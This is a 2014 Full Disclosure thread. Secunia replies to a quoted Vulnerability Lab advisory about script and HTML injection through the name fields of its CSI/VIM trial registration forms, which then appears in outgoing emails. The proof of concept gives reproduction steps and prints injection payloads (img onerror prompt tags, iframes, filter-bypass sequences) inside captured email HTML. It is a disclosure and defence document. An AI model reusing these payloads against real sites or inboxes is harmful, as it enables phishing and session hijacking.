Re: Secunia CSI/VIM - Filter Bypass & Persistent Validation Vulnerabilities

["Secunia Research" <vuln () secunia com>]

Hello List,

First of all to clarify, as the report switches from implying that the CSI / VIM products are affected to the claim the 
“CSI & VIM - Web Application & Online Service 2014 Q2” being affected, this is definitely not an issue in the CSI nor 
in the VIM product. The issue is located on the secunia.com website.

The issue you describe makes it possible for a malicious person to inject potentially malicious content in the 
firstname and lastname fields, and that content will be used in an email that is sent out to the email address entered 
in the email field, at a later stage.

JavaScript content within emails may of course always execute, if an email client is used without restricting 
JavaScript, which in general would be considered neglectful behavior. Furthermore the step to send JavaScript via email 
can actually be performed by e.g. using various web services more efficiently and directly.

With all that in mind, as an enhancement we have of course taken steps to ensure the the firstname and lastname fields 
are sanitized for potentially malicious content in the future.

Also, should you in the future want to do a coordinated disclosure of your findings – be it an actual vulnerability or 
an enhancement - then please feel free to reach out to us.

--
Kind regards,

Kasper Lindgaard
Director, Research & Security

Follow us on twitter
http://twitter.com/secunia

Secunia 
Rued Langgaards Vej 8
DK-2300 Copenhagen S
Denmark

Phone:  +45 7020 5144
Fax:    +45 7020 5145



-----Original Message-----
From: Fulldisclosure [mailto:fulldisclosure-bounces () seclists org] On Behalf Of Vulnerability Lab
Sent: 18. juni 2014 16:00
To: fulldisclosure () seclists org
Cc: full-disclosure () lists grok org uk
Subject: [FD] Secunia CSI/VIM - Filter Bypass & Persistent Validation Vulnerabilities

Document Title:
===============
Secunia CSI/VIM - Filter Bypass & Persistent Validation Vulnerabilities 


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1272


Release Date:
=============
2014-06-18


Vulnerability Laboratory ID (VL-ID):
====================================
1272


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
The Secunia CSI 7.0 combines scanning and patching, thereby meeting the requirements of both IT security and IT 
operations. This combination of vulnerability intelligence, vulnerability scanning, patch creation and patch deployment 
is unique in the industry.  The Secunia CSI is an authenticated internal vulnerability scanner, capable of assessing 
the security state of practically all legitimate programs running on Microsoft Windows platforms and supports scanning 
of Windows, Apple Mac OSX, Android and Red Hat Enterprise Linux (RHEL) platforms. 

( Copy of the Vendor Homepage: http://secunia.com/vulnerability_scanning/ )

Secunia’s Vulnerability Intelligence Manager is vulnerability intelligence brought to you on time, every time, by 
Secunia’s renowned research team.
The Secunia VIM covers more than 50,000 systems and applications. The software vulnerability alerts are brought to you 
instantaneously, and threat levels are prioritized, so you and your team can address the most critical vulnerabilities 
first. Comprehensive reporting lets you assess the current state of your IT infrastructure, manage the risks, meet 
compliancy policy rules, and get an increased return on your security investment. With Secunia`s powerful Vulnerability 
Intelligence and Management solution you can implement remediation strategies effectively and keep your organization 
secure.

( Copy of the Vendor Homepage: http://secunia.com/vulnerability_intelligence/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a medium severity vulnerability in the official Secunia CSI/VIM 
web-application service.


Vulnerability Disclosure Timeline:
==================================
2014-06-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Secunia
Product: CSI & VIM - Web Application & Online Service 2014 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Secunia website web-application for 
csi/vim account registration.
The vulnerability allows an remote attacker to inject own malicious script codes to the application-side of the 
vulnerable web-application service.

The vulnerability is located in the web input form of the registration to the csi and vim program. The user is able to 
register with persistent script codes as first- & lastname.The affect becomes visible in the outgoing email of the 
web-server and could maybe affect other sections in the profile. The attacker injects a payload and streams the 
malicious mail with own content to a secunia- or random-user. The filter of the web-server is not validating the 
context of the mail on input through the website. The result is an application-side script code execution in the mail 
header after the introduction word `Dear`. The mail includes the registered user (db stored) with the payload context 
and does not encode the input.

The secunia web-server tries to encode the input and prevents it with `/`. The attacker can input multiple strings and 
between the parse with the `/` the persistent script code execution occurs. The issue allows attackers to inject 
`frames`, `iframes`, `img` and different other html tags with own script codes. The mails can be send to random user 
for phishing attacks with persistent attack vector or directly to well known secunia customers via mail. 

The security risk of the persistent input validation web vulnerability in the mail encldoing of the web-server is 
estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.

Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and 
no privileged secunia vim/csi application user account. Successful exploitation of the persistent mail encoding web 
vulnerability results in persistent phishing attacks against customers or random email users, session hijacking, 
persistent redirects to malware and persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] /products/corporate/vim/trial/
                                [+] /vulnerability_scanning/corporate/trial/

Vulnerable Parameter(s):
                                [+] First- & Lastname

Affected Section(s):
                                [+] Secunia CSI - Mail Notification
                                [+] Secunia VIM - Mail Notification


Note: A demo user can also become a registered secunia user with the same profile credentials which impact the risk to 
receive later compromised service email notifications or execution of payload in the user frontend/backend next to the 
db stored profile values.


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerabilities can be exploited remote attackers without privileged application user 
account or with low privileged 
application user account and without user interaction. For security demonstration or to reproduce the security 
vulnerability follow the provided 
information and steps below to continue.

1. Open the two vulnerable service registration formulars > http://secunia.com/products/corporate/vim/trial/  > 
http://secunia.com/vulnerability_scanning/corporate/trial/
2. Inject own script code (payload) to the vulnerable first- & lastname input field values
3. Submit the formulars to secunia
4. Check your registration postbox and review the first arriving email of secunia during the registration tral 
procedure for example
5. The persistent script code execution occurs in the mail next to the introduction word `Dear` x=First- & Lastname
6. Successful reproduce of the persistent mail encoding web-server vulnerability!

Note: A demo user can become a registered secunia user with the same credentials which impact also a risk to later 
email notifications or service values.
The attacker is able to send the mail to random new email or to other secunia customers email by a mailing list.

Sender Account: @response.secunia.com
Tester Account: bkm () evolution-sec com
Test Date:      08.05.2014 23:12 & 18.06.2014

PoC: Secunia CSI - Did you get off to a good start?

<tr><td id="empty30" align="left" height="30" valign="top" width="30"></td><td rowspan="12" colspan="1" id="view31" 
style="color: #000000; 
font-family: Arial; font-size: 12px; line-height: 18px; letter-spacing: 0px" align="left" height="300" valign="top" 
width="410"><div id="sc54725" 
class="sc-view hidden-border inline-styled-view editor-outline" style="left: 30px; width: 410px; top: 30px; height: 
300px; color: #000000; font-family: 
Arial; font-size: 12px; line-height: 18px; letter-spacing: 0px; overflow: hidden"><div class="co-border-style" style="">
<table bordercollapse="collapse" class="co-style-table" style="color: #000000; font-family: Arial; font-size: 12px; 
line-height: 18px; letter-spacing:
 0px; margin-top: 0px; margin-left: 0px; margin-right: 0px; margin-bottom: 0px" border="0" cellpadding="0" 
cellspacing="0" height="300" width="410">
<tbody><tr><td class="valign-able" valign="top"><span class="remove-absolute"><span style="color:rgb(85, 85, 
85);"><font style="font-size:14px;">
<b>Dear \">%20"><img src=http://www.vulnerability-lab.com onerror="prompt(1337);<img 
src=http://www.vulnerability-lab.com onerror="prompt(1337);"></b>
<br><br>We just want to make sure that your installation went well.<br><br>We
 know from experience that getting a good start is crucial to making the most of your free trial. Therefore it is very 
important to us that you are 
satisfied with the installation and don’t encounter any problems during the first few days.<br><br>Please don’t 
hesitate to contact our Customer 
Support Center at <a style="" href="mailto:csc () secunia com">csc () secunia com</a> if you need any assistance or 
have any questions.<br>
<br>Stay Secure,<br>Secunia</font></span>

... or 

PoC: Kommende Secunia Partner Events in Deutschland

<table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td align="center" 
height="0"></td></tr><tr><td><table bordercollapse="collapse" 
id="sc3124" style="table-layout: auto; background-color: #ffffff" cellpadding="0" cellspacing="0" align="center" 
border="0" width="800">
<tbody><tr><td rowspan="1" colspan="14" id="view0" style="" align="left" height="300" valign="top" width="800"><div 
id="sc3308" class="sc-view" 
style="left: 0px; width: 800px; top: 0px; height: 300px; overflow: hidden"><div class="co-border-style" 
style="border-width: 2px; border-style: none">
<table bordercollapse="collapse" class="co-style-table" style="margin-top: 0px; margin-left: 0px; margin-right: 0px; 
margin-bottom: 0px" cellpadding="0" 
cellspacing="0" border="0" height="300" width="800"><tbody><tr><td class="valign-able" valign="top">
<img 
src="http://img.en25.com/EloquaImages/clients/SecuniaApS/{6611650f-4a88-4ce0-bc2b-a62700267197}_ADN-PartnerEvents_email_bannerJune2014.jpg";
 
title="" alt="" id="sc3310" class="sc-view sc-image-view editor-outline sc-regular-size" style="display: block" 
height="300" width="800">
</td></tr></tbody></table></div></div></td></tr><tr><td id="empty14" align="left" height="23" valign="top" 
width="30"></td><td id="empty15" align="left" 
height="23" valign="top" width="45"></td><td id="empty16" align="left" height="23" valign="top" width="5"></td><td 
id="empty17" align="left" height="23" 
valign="top" width="250"></td><td id="empty18" align="left" height="23" valign="top" width="210"></td><td id="empty19" 
align="left" height="23" valign="top" 
width="28"></td><td id="empty20" align="left" height="23" valign="top" width="2"></td><td id="empty21" align="left" 
height="23" valign="top" width="1">
</td><td id="empty22" align="left" height="23" valign="top" width="29"></td><td id="empty23" align="left" height="23" 
valign="top" width="1"></td><td id="empty24" 
align="left" height="23" valign="top" width="16"></td><td id="empty25" align="left" height="23" valign="top" 
width="113"></td><td id="empty26" align="left" 
height="23" valign="top" width="46"></td><td id="empty27" align="left" height="23" valign="top" 
width="24"></td></tr><tr><td id="empty28" align="left" 
height="78" valign="top" width="30"></td><td rowspan="1" colspan="11" id="view29" style="color: #000000; font-family: 
Arial; font-size: 12px; line-height: 
18px; letter-spacing: 0px" align="left" height="78" valign="top" width="700"><div id="sc3219" class="sc-view 
hidden-border inline-styled-view editor-outline" 
style="left: 30px; width: 700px; top: 323px; height: 78px; color: #000000; font-family: Arial; font-size: 12px; 
line-height: 18px; letter-spacing: 0px; 
overflow: hidden"><div class="co-border-style" style=""><table bordercollapse="collapse" class="co-style-table" 
style="color: #000000; font-family: Arial; 
font-size: 12px; line-height: 18px; letter-spacing: 0px; margin-top: 0px; margin-left: 0px; margin-right: 0px; 
margin-bottom: 0px" cellpadding="0" 
cellspacing="0" border="0" height="78" width="700"><tbody><tr><td class="valign-able" valign="top"><span 
class="remove-absolute"><b>
<span style="color:rgb(85, 85, 85);font-size:14px;">Sehr geehrte</span><font style="font-size:14px;color:rgb(85, 85, 
85);"> </font></b>
<font style="font-size:14px;"><b style="color:rgb(85, 85, 85);">\"><img src="\"x\"">%20>\
"<\">%20"><img src=http://www.vulnerability-lab.com onerror="prompt(1337);<img src=http://www.vulnerability-lab.com 
onerror="prompt(1337);">"><iframe> \"><img src=\"x\">%20>\"<iframe src=a><iframe>2</b>
</font><br><br><div><font color="#555555" style="font-size:14px;">wir möchten Sie auf anstehende Veranstaltungen 
unserer <b>Secunia Partner in Deutschland</b> 
aufmerksam machen, auf denen Sie unsere Lösungen vor Ort erleben 
können:</font></div></span></td></tr></table></div></div></td><td align="left" valign="top" 
width="46" height="78" id="empty40"></td><td align="left" valign="top" width="24" height="78" 
id="empty41"></td></tr><tr><td align="left" valign="top" 
width="30" height="10" id="empty42"></td><td align="left" valign="top" width="45" height="10" id="empty43"></td><td 
align="left" valign="top" width="5" 
height="10" id="empty44"></td><td align="left" valign="top" width="250" height="10" id="empty45"></td><td align="left" 
valign="top" width="210" 
height="10" id="empty46"></td>



Reference(s):
http://secunia.com/products/corporate/vim/trial/
http://secunia.com/vulnerability_scanning/corporate/trial/


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png
                                ../4.png

Resource(s):
                                ../Secunia CSI – Did you get off to a good start.html
                                ../Kommende Secunia Partner Events in Deutschland.html


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of all input fields with the vulnerable first- & lastname 
value in the registrations. 
The registration formular (csi/vim) needs to be encode and a secure input restriction for special chars validation is 
required. Parse and encode also 
the outgoing mail context and disallow html script code as user values to prevent further attacks.


Security Risk:
==============
The security risk of the mail encoding vulnerability in the registration module is estimated as medium with a cvss of 
3.9.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or 
special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or 
encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/